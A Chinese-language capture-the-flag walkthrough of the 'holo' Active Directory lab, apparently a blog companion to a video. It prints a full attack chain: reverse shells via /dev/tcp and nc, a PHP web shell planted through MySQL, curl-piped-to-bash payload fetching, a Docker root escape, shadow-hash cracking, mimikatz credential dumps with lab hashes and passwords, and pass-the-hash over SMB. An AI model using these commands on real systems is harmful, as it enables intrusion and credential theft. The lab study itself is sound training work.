【靶机】holo-AD域渗透&web_lab-外网渗透-内网渗透

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 视频教程:【【靶机】holo-AD域渗透&web_lab(1)-外网渗透-内网渗透】 https://www.bilibili.com/video/BV13G4y1j7xF/?share_source=copy_web&vd_source=21485fc93994c5f47b14e02ed42e0e49

holo

【【靶机】holo-AD域渗透&web_lab(1)-外网渗透-内网渗透】 https://www.bilibili.com/video/BV13G4y1j7xF/?share_source=copy_web&vd_source=21485fc93994c5f47b14e02ed42e0e49

┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 10.200.110.33 -A 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-26 16:04 CST
Nmap scan report for 10.200.110.33 (10.200.110.33)
Host is up (0.19s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE    SERVICE            VERSION
22/tcp    open     ssh                OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 41:38:8d:8a:ee:8a:4b:6c:f9:f0:a3:79:e8:96:3b:36 (RSA)
|   256 63:66:d6:68:60:67:9a:36:ae:d1:99:b7:8b:66:4e:6d (ECDSA)
|_  256 87:00:d8:b1:c7:63:5e:9c:30:8c:3d:e1:d0:5a:79:63 (ED25519)
80/tcp    open     http               Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: WordPress 5.5.3
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-title: holo.live
109/tcp   filtered pop2
465/tcp   filtered smtps
720/tcp   filtered unknown
911/tcp   filtered xact-backup
999/tcp   filtered garcon
1110/tcp  filtered nfsd-status
1259/tcp  filtered opennl-voice
1524/tcp  filtered ingreslock
2222/tcp  filtered EtherNetIP-1
5959/tcp  filtered unknown
5960/tcp  filtered unknown
6003/tcp  filtered X11:3
6668/tcp  filtered irc
6881/tcp  filtered bittorrent-tracker
8093/tcp  filtered unknown
14000/tcp filtered scotty-ft
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
──(zacarx㉿zacarx)-[~]
└─$ wpscan --url "http://10.200.110.33" --enumerate u

....


[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-UA-Compatible: IE=edge
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.200.110.33/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.200.110.33/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.200.110.33/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.200.110.33/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.200.110.33/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.200.110.33/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.
+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.200.110.33/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
┌──(zacarx㉿zacarx)-[~/SecLists/Discovery/DNS]
└─$ gobuster vhost -u holo.live -w ./subdomains-top1million-5000.txt -t 1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://holo.live
[+] Method:       GET
[+] Threads:      1
[+] Wordlist:     ./subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/12/26 16:31:44 Starting gobuster in VHOST enumeration mode
===============================================================

...
因为网络,大量报错432就不复制了
最后找到了,dev,admin子域名

我们对这三个域名进行目录爆破

得到:

www.holo.live/robots.txt
dev.holo.live/about.php
dev.holo.live/img.php
dev.holo.live/index.php

User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt

后来,我发现dev.holo.live出现本地文件包含漏洞

让我们试试我们使用的有效载荷---http://dev.holo.live/img.php?file=../../../etc/passwd

得到

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

我们可以搜到利用这个漏洞拿到admin凭证

 know you forget things, so I'm leaving this note for you:
admin:DBManagerLogin!
- gurag <3

我们在管理网页源码查看页发现了?cmd= 执行漏洞

于是cmd建立反弹shell

推荐bash -c 'bash -i >& /dev/tcp/10.50.107.175/8888 0>&1

然后找到db_config文件

<?php

define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');

$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);

if($connection == false){

        die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>
find / -type f -name "*.dockerenv" -ls 2>/dev/null

得知我们身处容器之中,需要逃逸

python3 -c 'import pty;pty.spawn("/bin/bash")'

我们连接mysql

mysql -u admin -p -h 192.168.100.1

结果没回显

那么再次安利渗透猴

Reverse Shell Cheat Sheet | pentestmonkey

后来我发现

python3 -c 'import pty; pty.spawn("/bin/bash")'

但是

python -c 'import pty; pty.spawn("/bin/bash")'

不可

算是长教训了,泪目。

最后在数据库发现:

mysql> select * from users;
select * from users;
+----------+-----------------+
| username | password        |
+----------+-----------------+
| admin    | DBManagerLogin! |
| gurag    | AAAA            |
+----------+-----------------+
2 rows in set (0.00 sec)

然后我们利用数据库进行权限突破

CREATE TABLE hax(Code varchar(255));
INSERT INTO hax (Code) value ('<?php $cmd=$_GET[\"cmd\"]\;system($cmd)\;?>');
>>>mysql> SELECT * FROM hax;
SELECT * FROM hax;
+-----------------------------------------+
| Code                                    |
+-----------------------------------------+
| <?php $cmd=$_GET["cmd"];system($cmd);?> |
+-----------------------------------------+
1 row in set (0.00 sec)

我们查看secure_file_priv变量

mysql> SHOW VARIABLES LIKE "secure_file_priv";

mysql> SHOW VARIABLES LIKE "secure_file_priv";
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv | /var/www/html/ |
+------------------+----------------+
1 row in set (0.00 sec)

因此,我们进行写入操作

SELECT * FROM hax INTO OUTFILE '/var/www/html/hax.php';
www-data@14c75992b944:/tmp/babbadeckl$ for i in {1..10000};do 2>/dev/null > /dev/tcp/192.168.100.1/$i && echo Port $i open;done
Port 22 open
Port 80 open
Port 3306 open
Port 8080 open

检查有效性

curl 192.168.100.1:8080/hax.php?cmd=id
curl http://192.168.100.1:8080/hax.php?cmd=nc+-e+/bin/sh+10.50.107.175+9999
这个方法貌似不管用了
我们换种方法。

find / -perm -u=s -type f 2>/dev/null

我们在卡里建立1.sh

写入1.sh

#!/bin/bash
bash -i >& /dev/tcp/10.50.107.175/999 0>&1

然后建立http服务

然后使用msf监听

msfconsole
use multi/handler
set LHOST tun0
set LPORT 53
run

然后我们在shell输入

curl 192.168.100.1:8080/hax.php?cmd=curl%20http%3A%2F%2F10.50.107.175%3A80%2F1.sh%7Cbash%20%26

c^z退出

search post/multi/manage/shell_to_meterpreter
use 0
set session 1
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >> linpeas.sh

chmod +x linpeas.sh

upload linpeas.sh

shell

chmod 777 linpeas.sh

./linpeas.sh >> linpeas.txt
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/docker
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chsh

docker有点可疑,于是我们搜下能不能利用

搜到了!

docker | GTFOBins

于是我们输入

/usr/bin/docker run -v /:/mnt --rm -it alpine chroot /mnt sh

报错

Unable to find image 'alpine:latest' locally

我们输入docker ps -a

得到image,替换下

python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/docker run -v /:/mnt --rm -it cb1b741122e8 chroot /mnt sh
不过我们依旧在容器上
于是我们输入
docker image ls
找到unbuntu版本
/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh

我们cat /etc/shadow文件

得到

# cat /etc/shadow
cat /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:$6$Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:18570:0:99999:7:::

然后我们用hashcat爆破

hashcat -a 0 -m 1800 p.txt /usr/share/wordlists/rockyou.txt

得到密码linuxrulez

sshuttle -r linux-admin@10.200.111.33 10.200.111.0/24

ssh-keygen -t rsa

获取密钥

把自己的密钥加到/root/.ssh/authorized_keys

貌似nmap不行

于是

我们ssh登录到10.200.110.33

root@ip-10-200-110-33:~# nmap -sP 10.200.110.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-28 06:25 UTC
Nmap scan report for ip-10-200-110-1.eu-west-1.compute.internal (10.200.110.1)
Host is up (0.00012s latency).
MAC Address: 02:27:12:F2:56:27 (Unknown)
Nmap scan report for ip-10-200-110-30.eu-west-1.compute.internal (10.200.110.30)
Host is up (0.0011s latency).
MAC Address: 02:7B:52:BC:1E:D3 (Unknown)
Nmap scan report for ip-10-200-110-31.eu-west-1.compute.internal (10.200.110.31)
Host is up (0.00041s latency).
MAC Address: 02:2D:A4:13:01:2F (Unknown)
Nmap scan report for ip-10-200-110-32.eu-west-1.compute.internal (10.200.110.32)
Host is up (0.00032s latency).
MAC Address: 02:3E:0F:BB:96:B3 (Unknown)
Nmap scan report for ip-10-200-110-35.eu-west-1.compute.internal (10.200.110.35)
Host is up (0.0011s latency).
MAC Address: 02:90:CD:DE:93:AD (Unknown)
Nmap scan report for ip-10-200-110-250.eu-west-1.compute.internal (10.200.110.250)
Host is up (0.00059s latency).
MAC Address: 02:FC:B2:BC:42:65 (Unknown)
Nmap scan report for ip-10-200-110-33.eu-west-1.compute.internal (10.200.110.33)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.70 seconds

哦我们发现

10.200.110.31

有一个登录页面

页面有重置密码,我们很轻易的就通过逻辑漏洞将其突破

后来我们看到了,文件上传漏洞

之前讲过的知识了

我们直接屏蔽js

轻松上传

注意第一次我执行失败

因为我用的是linux的php反弹shell文件

然后我们就拿到了shell

下载minikatz

Download mimikatz from SourceForge.net

然后上传

powershell.exe Invoke-WebRequest http://10.50.107.175/mimikatz.exe -outfile mimikatz.exe

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

得到

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

668    {0;000003e7} 1 D 21351         NT AUTHORITY\SYSTEM    S-1-5-18    (04g,21p)    Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 2076472       NT AUTHORITY\SYSTEM    S-1-5-18    (04g,28p)    Primary
 * Thread Token  : {0;000003e7} 1 D 2100336       NT AUTHORITY\SYSTEM    S-1-5-18    (04g,21p)    Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 306323 (00000000:0004ac93)
Session           : Interactive from 1
User Name         : watamet
Domain            : HOLOLIVE
Logon Server      : DC-SRV01
Logon Time        : 12/28/2022 5:34:26 AM
SID               : S-1-5-21-471847105-3603022926-1728018720-1132
    msv :    
     [00000003] Primary
     * Username : watamet
!!!!!
     * Domain   : HOLOLIVE
     * NTLM     : d8d41e6cf762a8c77776a1843d4141c9
!!!!
     * SHA1     : 7701207008976fdd6c6be9991574e2480853312d
     * DPAPI    : 300d9ad961f6f680c6904ac6d0f17fd0
    tspkg :    
    wdigest :    
     * Username : watamet
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    


!!!
     * Username : watamet
     * Domain   : HOLO.LIVE
     * Password : Nothingtoworry!
     
!!!!
    ssp :    
    credman :    

Authentication Id : 0 ; 45785 (00000000:0000b2d9)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:05 AM
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : S-SRV01$
     * Domain   : holo.live
     * Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef 
    ssp :    
    credman :    

Authentication Id : 0 ; 45707 (00000000:0000b28b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:05 AM
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : S-SRV01$
     * Domain   : holo.live
     * Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef 
    ssp :    
    credman :    

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : S-SRV01$
Domain            : HOLOLIVE
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:05 AM
SID               : S-1-5-20
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : s-srv01$
     * Domain   : HOLO.LIVE
     * Password : (null)
    ssp :    
    credman :    

Authentication Id : 0 ; 27323 (00000000:00006abb)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:05 AM
SID               : S-1-5-96-0-0
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : S-SRV01$
     * Domain   : holo.live
     * Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef 
    ssp :    
    credman :    

Authentication Id : 0 ; 27283 (00000000:00006a93)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:05 AM
SID               : S-1-5-96-0-1
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : S-SRV01$
     * Domain   : holo.live
     * Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef 
    ssp :    
    credman :    

Authentication Id : 0 ; 26060 (00000000:000065cc)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:04 AM
SID               : 
    msv :    
     [00000003] Primary
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * NTLM     : 3179c8ec65934b8d33ac9ec2a9d93400
     * SHA1     : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
    tspkg :    
    wdigest :    
    kerberos :    
    ssp :    
    credman :    

Authentication Id : 0 ; 306298 (00000000:0004ac7a)
Session           : Interactive from 1
User Name         : watamet
Domain            : HOLOLIVE
Logon Server      : DC-SRV01
Logon Time        : 12/28/2022 5:34:26 AM
SID               : S-1-5-21-471847105-3603022926-1728018720-1132
    msv :    
     [00000003] Primary
     * Username : watamet
     * Domain   : HOLOLIVE
     * NTLM     : d8d41e6cf762a8c77776a1843d4141c9
     * SHA1     : 7701207008976fdd6c6be9991574e2480853312d
     * DPAPI    : 300d9ad961f6f680c6904ac6d0f17fd0
    tspkg :    
    wdigest :    
     * Username : watamet
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : watamet
     * Domain   : HOLO.LIVE
     * Password : (null)
    ssp :    
    credman :    

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:10 AM
SID               : S-1-5-17
    msv :    
    tspkg :    
    wdigest :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :    
    ssp :    
    credman :    

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:06 AM
SID               : S-1-5-19
    msv :    
    tspkg :    
    wdigest :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :    
    credman :    

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : S-SRV01$
Domain            : HOLOLIVE
Logon Server      : (null)
Logon Time        : 12/28/2022 5:34:04 AM
SID               : S-1-5-18
    msv :    
    tspkg :    
    wdigest :    
     * Username : S-SRV01$
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    
     * Username : s-srv01$
     * Domain   : HOLO.LIVE
     * Password : (null)
    ssp :    
    credman :    

mimikatz(commandline) # exit
Bye!

然后我们使用

CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具

Passing-the-Hash

CME支持使用带-H标志的Passing-The-Hash攻击通过SMB进行身份验证

crackmapexec smb <target(s)> -u username -H NTHASH

这可以让我们搜索到内部网络中的现有 SMB 服务器

crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9

    得到                                                                                                                                  
┌──(zacarx㉿zacarx)-[~]
└─$ crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
SMB         10.200.110.30   445    DC-SRV01         [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.35   445    PC-FILESRV01     [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.31   445    S-SRV01          [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.30   445    DC-SRV01         [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 
SMB         10.200.110.35   445    PC-FILESRV01     [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 
SMB         10.200.110.31   445    S-SRV01          [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 (Pwn3d!)

我们连接一下

smbclient //10.200.110.35/Users -U HOLOLIVE/watamet

拿到user.txt

shuru

